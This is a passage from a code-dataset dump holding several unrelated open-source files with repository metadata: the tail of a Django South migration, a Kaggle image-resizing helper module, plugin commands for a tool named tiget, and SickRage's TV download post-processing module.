('ts', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime(2015, 8, 30, 0, 0))),
('content', self.gf('django.db.models.fields.TextField')()),
('title', self.gf('django.db.models.fields.CharField')(default='New Post', max_length=100)),
('excerpt', self.gf('django.db.models.fields.CharField')(max_length=100, blank=True)),
('status', self.gf('django.db.models.fields.IntegerField')(default=0)),
('comment_status', self.gf('django.db.models.fields.IntegerField')(default=0)),
('pwd', self.gf('django.db.models.fields.CharField')(max_length=100, blank=True)),
('lastts', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('like_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
('share_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
('comment_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
('url', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
('album', self.gf('django.db.models.fields.IntegerField')(default=0)),
('cover', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
))
db.send_create_signal(u'post', ['Post'])
# Adding M2M table for field tags on 'Post'
m2m_table_name = db.shorten_name(u'post_post_tags')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('post', models.ForeignKey(orm[u'post.post'], null=False)),
('tag', models.ForeignKey(orm[u'tag.tag'], null=False))
))
db.create_unique(m2m_table_name, ['post_id', 'tag_id'])
def backwards(self, orm):
# Deleting model 'Post'
db.delete_table(u'post_post')
# Removing M2M table for field tags on 'Post'
db.delete_table(db.shorten_name(u'post_post_tags'))
models = {
u'post.post': {
'Meta': {'object_name': 'Post'},
'album': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'author': ('django.db.models.fields.IntegerField', [], {}),
'comment_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'comment_status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'content': ('django.db.models.fields.TextField', [], {}),
'cover': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'excerpt': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lastts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'like_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'pwd': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'share_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['tag.Tag']", 'symmetrical': 'False'}),
'title': ('django.db.models.fields.CharField', [], {'default': "'New Post'", 'max_length': '100'}),
'ts': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2015, 8, 30, 0, 0)'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
u'tag.tag': {
'Meta': {'object_name': 'Tag'},
'add_ts': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2015, 8, 30, 0, 0)'}),
'cover': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
}
}
complete_apps = ['post']
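# With South installed, this schema migration would typically be applied with
# (assuming the app is registered as 'post' in INSTALLED_APPS):
#     python manage.py migrate post 0001_initial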
|
gpl-3.0
| 580,585,524,880,129,500
| 58.6625
| 127
| 0.573764
| false
| 3.553239
| false
| false
| false
|
jjtoharia/Kaggle_Intel-MobileODT-Cervical-Cancer-Screening
|
jjtz_intel_funciones.py
|
1
|
3570
|
#!/usr/bin/env python3
# I want utf8: áéíóú
from PIL import ImageFilter, ImageStat, Image, ImageDraw
from multiprocessing import Pool, cpu_count
# conda install --channel https://conda.anaconda.org/menpo opencv3
from cv2 import imread as cv2_imread, resize as cv2_resize, INTER_AREA as cv2_INTER_AREA # http://tanbakuchi.com/posts/comparison-of-openv-interpolation-algorithms/
import time
def timefunc(f):
def f_timer(*args, **kwargs):
start = time.time()
result = f(*args, **kwargs)
end = time.time()
        print(f.__name__, ': ', '{:,.4f}'.format(end - start), ' secs.')
return(result)
return(f_timer)
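# Example use of the decorator (illustrative):
#     @timefunc
#     def load_images(paths):
#         ...
# Each call then prints the function name and the elapsed wall-clock time,
# as done for im_stats() and normalize_image_features() below.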
from datetime import datetime
def jj_datetime(): return(datetime.now().strftime('%Y-%m-%d %H:%M:%S -')) # print(jj_datetime(), xxxx)
def jj_datetime_filename(): return(datetime.now().strftime('%Y%m%d_%H%M%S'))
def jj_input_filename_suffix(n_resize_to, b_con_muestreo): return('_{:}'.format(n_resize_to) + ('_prueba' if b_con_muestreo else ''))
def jj_safe_exec(ret_if_exception, function, *args):
try:
return(function(*args))
except:
return(ret_if_exception)
def im_multi(path):
from PIL import ImageFilter, ImageStat, Image, ImageDraw
try:
im_stats_im_ = Image.open(path)
return [path, {'size': im_stats_im_.size}]
except:
print(path)
return [path, {'size': (0,0)}]
@timefunc
def im_stats(im_stats_df):
from multiprocessing import Pool, cpu_count
im_stats_d = {}
p = Pool(cpu_count() - 1)
    #ret = [p.apply_async(im_multi, x) for x in im_stats_df['path']] # And then you have to use ret[n].get() to pull out each result!
ret = p.map(im_multi, im_stats_df['path'])
for i in range(len(ret)):
im_stats_d[ret[i][0]] = ret[i][1] # im_stats_d[ret[i].get()[0]] = ret[i].get()[1]
im_stats_df['size'] = im_stats_df['path'].map(lambda x: ' '.join(str(s) for s in im_stats_d[x]['size']))
return im_stats_df
def get_im_cv2_32(path):
img = cv2_imread(path)
resized = cv2_resize(img, (32, 32), cv2_INTER_AREA) #use cv2_resize(img, (64, 64), cv2_INTER_AREA)
return [path, resized]
def get_im_cv2_64(path):
img = cv2_imread(path)
resized = cv2_resize(img, (64, 64), cv2_INTER_AREA)
return [path, resized]
def get_im_cv2_256(path):
img = cv2_imread(path)
resized = cv2_resize(img, (256, 256), cv2_INTER_AREA)
return [path, resized]
def get_im_cv2_512(path):
img = cv2_imread(path)
resized = cv2_resize(img, (512, 512), cv2_INTER_AREA)
return [path, resized]
def get_im_cv2_1024(path):
img = cv2_imread(path)
resized = cv2_resize(img, (1024, 1024), cv2_INTER_AREA)
return [path, resized]
@timefunc
def normalize_image_features(paths, resize_to = 32):
import numpy as np
imf_d = {}
p = Pool(cpu_count())
if resize_to == 256:
ret = p.map(get_im_cv2_256, paths)
elif resize_to == 64:
ret = p.map(get_im_cv2_64, paths)
elif resize_to == 512:
ret = p.map(get_im_cv2_512, paths)
elif resize_to == 1024:
ret = p.map(get_im_cv2_1024, paths)
else:
ret = p.map(get_im_cv2_32, paths)
for i in range(len(ret)):
imf_d[ret[i][0]] = ret[i][1]
ret = []
fdata = [imf_d[f] for f in paths]
fdata = np.array(fdata, dtype=np.uint8)
fdata = fdata.transpose((0, 3, 1, 2))
fdata = fdata.astype('float32') # fdata.astype('float64')
fdata = fdata / 255
return fdata
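# Illustrative call (hypothetical paths):
#     fdata = normalize_image_features(['img1.jpg', 'img2.jpg'], resize_to=64)
# is expected to return a float32 array of shape (2, 3, 64, 64) with values
# scaled to [0, 1], given the channels-first transpose above.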
|
mit
| 8,852,059,636,198,243,000
| 32.95098
| 164
| 0.596914
| false
| 2.807087
| false
| false
| false
|
natano/tiget
|
tiget/core/cmds/plugin.py
|
1
|
1498
|
import pkg_resources
from tiget.cmds import Cmd
from tiget.plugins import load_plugin, unload_plugin, reload_plugin, plugins
__all__ = ['Load', 'Reload', 'Unload']
class Load(Cmd):
description = 'load plugin'
def setup(self):
self.parser.add_argument('plugin_name', nargs='?')
def do(self, args):
if args.plugin_name:
try:
load_plugin(args.plugin_name)
except ImportError as e:
raise self.error(e)
else:
self.print('Available plugins:')
entry_points = pkg_resources.iter_entry_points('tiget.plugins')
names = set(ep.name for ep in entry_points)
names.update(plugins.keys())
for name in sorted(names):
loaded = name in plugins
self.print('[{}] {}'.format('*' if loaded else ' ', name))
class Reload(Cmd):
description = 'reload plugin'
def setup(self):
self.parser.add_argument('plugin_name')
def do(self, args):
try:
reload_plugin(args.plugin_name)
except KeyError:
raise self.error('no plugin "{}" loaded'.format(args.plugin_name))
class Unload(Cmd):
description = 'unload plugin'
def setup(self):
self.parser.add_argument('plugin_name')
def do(self, args):
try:
unload_plugin(args.plugin_name)
except KeyError:
raise self.error('no plugin "{}" loaded'.format(args.plugin_name))
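# Illustrative usage from the tiget command prompt (command names assumed to
# be derived from the classes above):
#     load             # list available plugins, loaded ones marked with '*'
#     load someplugin  # load a plugin by entry-point name
#     reload someplugin
#     unload someplugin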
|
isc
| 7,311,382,799,280,952,000
| 26.236364
| 78
| 0.577437
| false
| 3.994667
| false
| false
| false
|
kingmotley/SickRage
|
sickbeard/processTV.py
|
1
|
29337
|
# coding=utf-8
# Author: Nic Wolfe <nic@wolfeden.ca>
# URL: https://sickrage.github.io/
# Git: https://github.com/SickRage/SickRage.git
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
import os
import stat
# from functools import wraps
import shutil
import sickbeard
from sickbeard import postProcessor
from sickbeard import db, helpers
from sickbeard import logger
from sickbeard.name_parser.parser import NameParser, InvalidNameException, InvalidShowException
from sickbeard import common
from sickbeard import failedProcessor
from sickrage.helper.common import is_sync_file, is_torrent_or_nzb_file
from sickrage.helper.encoding import ek, ss
from sickrage.helper.exceptions import EpisodePostProcessingFailedException, ex, FailedPostProcessingFailedException
from unrar2 import RarFile
from unrar2.rar_exceptions import FileOpenError
from unrar2.rar_exceptions import ArchiveHeaderBroken
from unrar2.rar_exceptions import InvalidRARArchive
from unrar2.rar_exceptions import InvalidRARArchiveUsage
from unrar2.rar_exceptions import IncorrectRARPassword
import shutil_custom
shutil.copyfile = shutil_custom.copyfile_custom
class ProcessResult(object): # pylint: disable=too-few-public-methods
def __init__(self):
self.result = True
self.output = ''
self.missedfiles = []
self.aggresult = True
def delete_folder(folder, check_empty=True):
"""
Removes a folder from the filesystem
:param folder: Path to folder to remove
:param check_empty: Boolean, check if the folder is empty before removing it, defaults to True
:return: True on success, False on failure
"""
# check if it's a folder
if not ek(os.path.isdir, folder):
return False
# check if it isn't TV_DOWNLOAD_DIR
if sickbeard.TV_DOWNLOAD_DIR:
if helpers.real_path(folder) == helpers.real_path(sickbeard.TV_DOWNLOAD_DIR):
return False
# check if it's empty folder when wanted checked
if check_empty:
check_files = ek(os.listdir, folder)
if check_files:
logger.log(u"Not deleting folder {0} found the following files: {1}".format(folder, check_files), logger.INFO)
return False
try:
logger.log(u"Deleting folder (if it's empty): {0}".format(folder))
ek(os.rmdir, folder)
except (OSError, IOError) as e:
logger.log(u"Warning: unable to delete folder: {0}: {1}".format(folder, ex(e)), logger.WARNING)
return False
else:
try:
logger.log(u"Deleting folder: " + folder)
shutil.rmtree(folder)
except (OSError, IOError) as e:
logger.log(u"Warning: unable to delete folder: {0}: {1}".format(folder, ex(e)), logger.WARNING)
return False
return True
def delete_files(processPath, notwantedFiles, result, force=False):
"""
Remove files from filesystem
:param processPath: path to process
:param notwantedFiles: files we do not want
:param result: Processor results
:param force: Boolean, force deletion, defaults to false
"""
if not result.result and force:
result.output += logHelper(u"Forcing deletion of files, even though last result was not success", logger.DEBUG)
elif not result.result:
return
# Delete all file not needed
for cur_file in notwantedFiles:
cur_file_path = ek(os.path.join, processPath, cur_file)
if not ek(os.path.isfile, cur_file_path):
            continue  # Prevent error when a not-wanted file is an associated file
result.output += logHelper(u"Deleting file: {0}".format(cur_file), logger.DEBUG)
# check first the read-only attribute
file_attribute = ek(os.stat, cur_file_path)[0]
if not file_attribute & stat.S_IWRITE:
# File is read-only, so make it writeable
result.output += logHelper(u"Changing ReadOnly Flag for file: {0}".format(cur_file), logger.DEBUG)
try:
ek(os.chmod, cur_file_path, stat.S_IWRITE)
except OSError as e:
result.output += logHelper(u"Cannot change permissions of {0}: {1}".format(cur_file_path, ex(e)), logger.DEBUG)
try:
ek(os.remove, cur_file_path)
except OSError as e:
result.output += logHelper(u"Unable to delete file {0}: {1}".format(cur_file, e.strerror), logger.DEBUG)
def logHelper(logMessage, logLevel=logger.INFO):
logger.log(logMessage, logLevel)
return logMessage + u"\n"
# def OneRunPP():
# isRunning = [False]
#
# def decorate(func):
# @wraps(func)
# def func_wrapper(*args, **kargs):
# if isRunning[0]:
# return logHelper(u'Post processor is already running', logger.WARNING)
#
# isRunning[0] = True
# ret = func(*args, **kargs)
# isRunning[0] = False
# return ret
# return func_wrapper
# return decorate
# pylint: disable=too-many-arguments,too-many-branches,too-many-statements,too-many-locals
# @OneRunPP()
def processDir(dirName, nzbName=None, process_method=None, force=False, is_priority=None, delete_on=False, failed=False, proc_type="auto"):
"""
Scans through the files in dirName and processes whatever media files it finds
:param dirName: The folder name to look in
:param nzbName: The NZB name which resulted in this folder being downloaded
:param force: True to postprocess already postprocessed files
:param failed: Boolean for whether or not the download failed
:param proc_type: Type of postprocessing auto or manual
"""
result = ProcessResult()
# if they passed us a real dir then assume it's the one we want
if ek(os.path.isdir, dirName):
dirName = ek(os.path.realpath, dirName)
result.output += logHelper(u"Processing folder {0}".format(dirName), logger.DEBUG)
# if the client and SickRage are not on the same machine translate the directory into a network directory
elif all([sickbeard.TV_DOWNLOAD_DIR,
ek(os.path.isdir, sickbeard.TV_DOWNLOAD_DIR),
ek(os.path.normpath, dirName) == ek(os.path.normpath, sickbeard.TV_DOWNLOAD_DIR)]):
dirName = ek(os.path.join, sickbeard.TV_DOWNLOAD_DIR, ek(os.path.abspath, dirName).split(os.path.sep)[-1])
result.output += logHelper(u"Trying to use folder: {0} ".format(dirName), logger.DEBUG)
# if we didn't find a real dir then quit
if not ek(os.path.isdir, dirName):
result.output += logHelper(u"Unable to figure out what folder to process. "
u"If your downloader and SickRage aren't on the same PC "
u"make sure you fill out your TV download dir in the config.",
logger.DEBUG)
return result.output
path, dirs, files = get_path_dir_files(dirName, nzbName, proc_type)
files = [x for x in files if not is_torrent_or_nzb_file(x)]
SyncFiles = [x for x in files if is_sync_file(x)]
nzbNameOriginal = nzbName
# Don't post process if files are still being synced and option is activated
postpone = SyncFiles and sickbeard.POSTPONE_IF_SYNC_FILES
if not postpone:
result.output += logHelper(u"PostProcessing Path: {0}".format(path), logger.INFO)
result.output += logHelper(u"PostProcessing Dirs: {0}".format(str(dirs)), logger.DEBUG)
videoFiles = [x for x in files if helpers.isMediaFile(x)]
rarFiles = [x for x in files if helpers.isRarFile(x)]
rarContent = []
if rarFiles:
rarContent = unRAR(path, rarFiles, force, result)
files += rarContent
videoFiles += [x for x in rarContent if helpers.isMediaFile(x)]
videoInRar = [x for x in rarContent if helpers.isMediaFile(x)] if rarContent else []
result.output += logHelper(u"PostProcessing Files: {0}".format(files), logger.DEBUG)
result.output += logHelper(u"PostProcessing VideoFiles: {0}".format(videoFiles), logger.DEBUG)
result.output += logHelper(u"PostProcessing RarContent: {0}".format(rarContent), logger.DEBUG)
result.output += logHelper(u"PostProcessing VideoInRar: {0}".format(videoInRar), logger.DEBUG)
# If nzbName is set and there's more than one videofile in the folder, files will be lost (overwritten).
nzbName = None if len(videoFiles) >= 2 else nzbName
process_method = process_method if process_method else sickbeard.PROCESS_METHOD
result.result = True
# Don't Link media when the media is extracted from a rar in the same path
if process_method in (u'hardlink', u'symlink') and videoInRar:
process_media(path, videoInRar, nzbName, u'move', force, is_priority, result)
delete_files(path, rarContent, result)
for video in set(videoFiles) - set(videoInRar):
process_media(path, [video], nzbName, process_method, force, is_priority, result)
elif sickbeard.DELRARCONTENTS and videoInRar:
process_media(path, videoInRar, nzbName, process_method, force, is_priority, result)
delete_files(path, rarContent, result, True)
for video in set(videoFiles) - set(videoInRar):
process_media(path, [video], nzbName, process_method, force, is_priority, result)
else:
for video in videoFiles:
process_media(path, [video], nzbName, process_method, force, is_priority, result)
else:
result.output += logHelper(u"Found temporary sync files: {0} in path: {1}".format(SyncFiles, path))
result.output += logHelper(u"Skipping post processing for folder: {0}".format(path))
result.missedfiles.append(u"{0} : Syncfiles found".format(path))
# Process Video File in all TV Subdir
for curDir in [x for x in dirs if validateDir(path, x, nzbNameOriginal, failed, result)]:
result.result = True
for processPath, dirlist_, fileList in ek(os.walk, ek(os.path.join, path, curDir), topdown=False):
if not validateDir(path, processPath, nzbNameOriginal, failed, result):
continue
SyncFiles = [x for x in fileList if is_sync_file(x)]
# Don't post process if files are still being synced and option is activated
postpone = SyncFiles and sickbeard.POSTPONE_IF_SYNC_FILES
if not postpone:
videoFiles = [x for x in fileList if helpers.isMediaFile(x)]
rarFiles = [x for x in fileList if helpers.isRarFile(x)]
rarContent = []
if rarFiles:
rarContent = unRAR(processPath, rarFiles, force, result)
fileList = set(fileList + rarContent)
videoFiles += [x for x in rarContent if helpers.isMediaFile(x)]
videoInRar = [x for x in rarContent if helpers.isMediaFile(x)] if rarContent else []
notwantedFiles = [x for x in fileList if x not in videoFiles]
if notwantedFiles:
result.output += logHelper(u"Found unwanted files: {0}".format(notwantedFiles), logger.DEBUG)
# Don't Link media when the media is extracted from a rar in the same path
if process_method in (u'hardlink', u'symlink') and videoInRar:
process_media(processPath, videoInRar, nzbName, u'move', force, is_priority, result)
process_media(processPath, set(videoFiles) - set(videoInRar), nzbName, process_method, force,
is_priority, result)
delete_files(processPath, rarContent, result)
elif sickbeard.DELRARCONTENTS and videoInRar:
process_media(processPath, videoInRar, nzbName, process_method, force, is_priority, result)
process_media(processPath, set(videoFiles) - set(videoInRar), nzbName, process_method, force,
is_priority, result)
delete_files(processPath, rarContent, result, True)
else:
process_media(processPath, videoFiles, nzbName, process_method, force, is_priority, result)
# Delete all file not needed and avoid deleting files if Manual PostProcessing
if not(process_method == u"move" and result.result) or (proc_type == u"manual" and not delete_on):
continue
delete_folder(ek(os.path.join, processPath, u'@eaDir'))
delete_files(processPath, notwantedFiles, result)
if all([not sickbeard.NO_DELETE or proc_type == u"manual",
process_method == u"move",
ek(os.path.normpath, processPath) != ek(os.path.normpath, sickbeard.TV_DOWNLOAD_DIR)]):
if delete_folder(processPath, check_empty=True):
result.output += logHelper(u"Deleted folder: {0}".format(processPath), logger.DEBUG)
else:
result.output += logHelper(u"Found temporary sync files: {0} in path: {1}".format(SyncFiles, processPath))
result.output += logHelper(u"Skipping post processing for folder: {0}".format(processPath))
result.missedfiles.append(u"{0} : Syncfiles found".format(path))
if result.aggresult:
result.output += logHelper(u"Successfully processed")
if result.missedfiles:
result.output += logHelper(u"I did encounter some unprocessable items: ")
for missedfile in result.missedfiles:
result.output += logHelper(u"[{0}]".format(missedfile))
else:
result.output += logHelper(u"Problem(s) during processing, failed the following files/folders: ", logger.WARNING)
for missedfile in result.missedfiles:
result.output += logHelper(u"[{0}]".format(missedfile), logger.WARNING)
return result.output
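# Illustrative call (hypothetical path): a post-processing run for a finished
# download might look like
#     output = processDir(u'/downloads/Some.Show.S01E01.720p', nzbName=None,
#                         process_method=u'move', force=False)
# The returned string is the accumulated log output; per-file successes and
# failures are appended to it as shown above.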
def validateDir(path, dirName, nzbNameOriginal, failed, result): # pylint: disable=too-many-locals,too-many-branches,too-many-return-statements
"""
Check if directory is valid for processing
:param path: Path to use
:param dirName: Directory to check
:param nzbNameOriginal: Original NZB name
:param failed: Previously failed objects
:param result: Previous results
:return: True if dir is valid for processing, False if not
"""
dirName = ss(dirName)
IGNORED_FOLDERS = [u'.AppleDouble', u'.@__thumb', u'@eaDir']
folder_name = ek(os.path.basename, dirName)
if folder_name in IGNORED_FOLDERS:
return False
result.output += logHelper(u"Processing folder " + dirName, logger.DEBUG)
if folder_name.upper().startswith(u'_FAILED_') or folder_name.upper().endswith(u'_FAILED_'):
result.output += logHelper(u"The directory name indicates it failed to extract.", logger.DEBUG)
failed = True
elif folder_name.upper().startswith(u'_UNDERSIZED_') or folder_name.upper().endswith(u'_UNDERSIZED_'):
result.output += logHelper(u"The directory name indicates that it was previously rejected for being undersized.", logger.DEBUG)
failed = True
elif folder_name.upper().startswith(u'_UNPACK') or folder_name.upper().endswith(u'_UNPACK'):
result.output += logHelper(u"The directory name indicates that this release is in the process of being unpacked.", logger.DEBUG)
result.missedfiles.append(u"{0} : Being unpacked".format(dirName))
return False
if failed:
process_failed(ek(os.path.join, path, dirName), nzbNameOriginal, result)
result.missedfiles.append(u"{0} : Failed download".format(dirName))
return False
if helpers.is_hidden_folder(ek(os.path.join, path, dirName)):
result.output += logHelper(u"Ignoring hidden folder: {0}".format(dirName), logger.DEBUG)
result.missedfiles.append(u"{0} : Hidden folder".format(dirName))
return False
# make sure the dir isn't inside a show dir
main_db_con = db.DBConnection()
sql_results = main_db_con.select("SELECT location FROM tv_shows")
for sqlShow in sql_results:
if dirName.lower().startswith(ek(os.path.realpath, sqlShow["location"]).lower() + os.sep) or \
dirName.lower() == ek(os.path.realpath, sqlShow["location"]).lower():
result.output += logHelper(
u"Cannot process an episode that's already been moved to its show dir, skipping " + dirName,
logger.WARNING)
return False
# Get the videofile list for the next checks
allFiles = []
allDirs = []
for root_, processdir, fileList in ek(os.walk, ek(os.path.join, path, dirName), topdown=False):
allDirs += processdir
allFiles += fileList
videoFiles = [x for x in allFiles if helpers.isMediaFile(x)]
allDirs.append(dirName)
# check if the dir have at least one tv video file
for video in videoFiles:
try:
NameParser().parse(video, cache_result=False)
return True
except (InvalidNameException, InvalidShowException) as error:
result.output += logHelper(u"{0}".format(error), logger.DEBUG)
for proc_dir in allDirs:
try:
NameParser().parse(proc_dir, cache_result=False)
return True
except (InvalidNameException, InvalidShowException) as error:
result.output += logHelper(u"{0}".format(error), logger.DEBUG)
if sickbeard.UNPACK:
# Search for packed release
packedFiles = [x for x in allFiles if helpers.isRarFile(x)]
for packed in packedFiles:
try:
NameParser().parse(packed, cache_result=False)
return True
except (InvalidNameException, InvalidShowException) as error:
result.output += logHelper(u"{0}".format(error), logger.DEBUG)
result.output += logHelper(u"{0} : No processable items found in folder".format(dirName), logger.DEBUG)
return False
def unRAR(path, rarFiles, force, result): # pylint: disable=too-many-branches,too-many-statements
"""
Extracts RAR files
:param path: Path to look for files in
:param rarFiles: Names of RAR files
:param force: process currently processing items
:param result: Previous results
:return: List of unpacked file names
"""
unpacked_files = []
if sickbeard.UNPACK and rarFiles:
result.output += logHelper(u"Packed Releases detected: {0}".format(rarFiles), logger.DEBUG)
for archive in rarFiles:
result.output += logHelper(u"Unpacking archive: {0}".format(archive), logger.DEBUG)
failure = None
try:
rar_handle = RarFile(ek(os.path.join, path, archive))
# Skip extraction if any file in archive has previously been extracted
skip_file = False
for file_in_archive in [ek(os.path.basename, x.filename) for x in rar_handle.infolist() if not x.isdir]:
if already_postprocessed(path, file_in_archive, force, result):
result.output += logHelper(
u"Archive file already post-processed, extraction skipped: {0}".format
(file_in_archive), logger.DEBUG)
skip_file = True
break
if skip_file:
continue
rar_handle.extract(path=path, withSubpath=False, overwrite=False)
for x in rar_handle.infolist():
if not x.isdir:
basename = ek(os.path.basename, x.filename)
if basename not in unpacked_files:
unpacked_files.append(basename)
del rar_handle
except ArchiveHeaderBroken:
failure = (u'Archive Header Broken', u'Unpacking failed because the Archive Header is Broken')
except IncorrectRARPassword:
failure = (u'Incorrect RAR Password', u'Unpacking failed because of an Incorrect Rar Password')
except FileOpenError:
failure = (u'File Open Error, check the parent folder and destination file permissions.',
u'Unpacking failed with a File Open Error (file permissions?)')
except InvalidRARArchiveUsage:
failure = (u'Invalid Rar Archive Usage', u'Unpacking Failed with Invalid Rar Archive Usage')
except InvalidRARArchive:
failure = (u'Invalid Rar Archive', u'Unpacking Failed with an Invalid Rar Archive Error')
except Exception as e:
failure = (ex(e), u'Unpacking failed for an unknown reason')
if failure is not None:
result.output += logHelper(u'Failed Unrar archive {0}: {1}'.format(archive, failure[0]), logger.ERROR)
result.missedfiles.append(u'{0} : Unpacking failed: {1}'.format(archive, failure[1]))
result.result = False
continue
result.output += logHelper(u"UnRar content: {0}".format(unpacked_files), logger.DEBUG)
return unpacked_files
def already_postprocessed(dirName, videofile, force, result): # pylint: disable=unused-argument
"""
Check if we already post processed a file
:param dirName: Directory a file resides in
:param videofile: File name
:param force: Force checking when already checking (currently unused)
    :param result: Previous results
    :return: True if the file has already been post-processed, False if not
"""
if force:
return False
# Avoid processing the same dir again if we use a process method <> move
main_db_con = db.DBConnection()
sql_result = main_db_con.select("SELECT release_name FROM tv_episodes WHERE release_name IN (?, ?) LIMIT 1", [dirName, videofile.rpartition('.')[0]])
if sql_result:
# result.output += logHelper(u"You're trying to post process a dir that's already been processed, skipping", logger.DEBUG)
return True
# Needed if we have downloaded the same episode @ different quality
# But we need to make sure we check the history of the episode we're going to PP, and not others
    try:  # if it fails to find any info (because we're doing an unparsable folder, like the TV root dir) it will throw an exception, which we want to ignore
parse_result = NameParser(dirName, tryIndexers=True).parse(dirName)
except (InvalidNameException, InvalidShowException): # ignore the exception, because we kind of expected it, but create parse_result anyway so we can perform a check on it.
parse_result = False # pylint: disable=redefined-variable-type
search_sql = "SELECT tv_episodes.indexerid, history.resource FROM tv_episodes INNER JOIN history ON history.showid=tv_episodes.showid" # This part is always the same
search_sql += " WHERE history.season=tv_episodes.season AND history.episode=tv_episodes.episode"
# If we find a showid, a season number, and one or more episode numbers then we need to use those in the query
if parse_result and parse_result.show.indexerid and parse_result.episode_numbers and parse_result.season_number:
search_sql += " AND tv_episodes.showid={0} AND tv_episodes.season={1} AND tv_episodes.episode={2}".format(
parse_result.show.indexerid, parse_result.season_number, parse_result.episode_numbers[0])
search_sql += " AND tv_episodes.status IN (" + ",".join([str(x) for x in common.Quality.DOWNLOADED]) + ")"
search_sql += " AND history.resource LIKE ? LIMIT 1"
sql_result = main_db_con.select(search_sql, ['%' + videofile])
if sql_result:
# result.output += logHelper(u"You're trying to post process a video that's already been processed, skipping", logger.DEBUG)
return True
return False
def process_media(processPath, videoFiles, nzbName, process_method, force, is_priority, result): # pylint: disable=too-many-arguments
"""
Postprocess mediafiles
:param processPath: Path to postprocess in
:param videoFiles: Filenames to look for and postprocess
:param nzbName: Name of NZB file related
:param process_method: auto/manual
:param force: Postprocess currently postprocessing file
:param is_priority: Boolean, is this a priority download
:param result: Previous results
"""
processor = None
for cur_video_file in videoFiles:
cur_video_file_path = ek(os.path.join, processPath, cur_video_file)
if already_postprocessed(processPath, cur_video_file, force, result):
result.output += logHelper(u"Skipping already processed file: {0}".format(cur_video_file), logger.DEBUG)
continue
try:
processor = postProcessor.PostProcessor(cur_video_file_path, nzbName, process_method, is_priority)
result.result = processor.process()
process_fail_message = u""
except EpisodePostProcessingFailedException as e:
result.result = False
process_fail_message = ex(e)
if processor:
result.output += processor.log
if result.result:
result.output += logHelper(u"Processing succeeded for {0}".format(cur_video_file_path))
else:
result.output += logHelper(u"Processing failed for {0}: {1}".format(cur_video_file_path, process_fail_message), logger.WARNING)
result.missedfiles.append(u"{0} : Processing failed: {1}".format(cur_video_file_path, process_fail_message))
result.aggresult = False
def get_path_dir_files(dirName, nzbName, proc_type):
"""
Get files in a path
:param dirName: Directory to start in
:param nzbName: NZB file, if present
:param proc_type: auto/manual
:return: a tuple of (path,dirs,files)
"""
path = u""
dirs = []
files = []
    if (dirName == sickbeard.TV_DOWNLOAD_DIR and not nzbName) or proc_type == u"manual":  # Scheduled Post Processing Active
# Get at first all the subdir in the dirName
for path, dirs, files in ek(os.walk, dirName):
break
else:
path, dirs = ek(os.path.split, dirName) # Script Post Processing
if not (nzbName is None or nzbName.endswith(u'.nzb')) and ek(os.path.isfile, ek(os.path.join, dirName, nzbName)): # For single torrent file without Dir
dirs = []
files = [ek(os.path.join, dirName, nzbName)]
else:
dirs = [dirs]
files = []
return path, dirs, files
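# For example, a scheduled run (dirName == sickbeard.TV_DOWNLOAD_DIR, no
# nzbName) returns the first os.walk level of the download dir, while a
# script-driven run on a single torrent file returns that one file in `files`
# with an empty `dirs` list.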
def process_failed(dirName, nzbName, result):
"""Process a download that did not complete correctly"""
if sickbeard.USE_FAILED_DOWNLOADS:
processor = None
try:
processor = failedProcessor.FailedProcessor(dirName, nzbName)
result.result = processor.process()
process_fail_message = u""
except FailedPostProcessingFailedException as e:
result.result = False
process_fail_message = ex(e)
if processor:
result.output += processor.log
if sickbeard.DELETE_FAILED and result.result:
if delete_folder(dirName, check_empty=False):
result.output += logHelper(u"Deleted folder: {0}".format(dirName), logger.DEBUG)
if result.result:
result.output += logHelper(u"Failed Download Processing succeeded: ({0}, {1})".format(nzbName, dirName))
else:
result.output += logHelper(u"Failed Download Processing failed: ({0}, {1}): {2}".format(nzbName, dirName, process_fail_message), logger.WARNING)
def subtitles_enabled(video):
"""
    Parse a video filename into a show to check whether subtitles are enabled for it
:param video: video filename to be parsed
"""
try:
parse_result = NameParser().parse(video, cache_result=True)
except (InvalidNameException, InvalidShowException):
        logger.log(u'Not enough information to parse filename into a valid show. Consider adding scene exceptions or improving naming for: {0}'.format(video), logger.WARNING)
return False
if parse_result.show.indexerid:
main_db_con = db.DBConnection()
sql_results = main_db_con.select("SELECT subtitles FROM tv_shows WHERE indexer_id = ? LIMIT 1", [parse_result.show.indexerid])
return bool(sql_results[0]["subtitles"]) if sql_results else False
else:
logger.log(u'Empty indexer ID for: {0}'.format(video), logger.WARNING)
return False
|
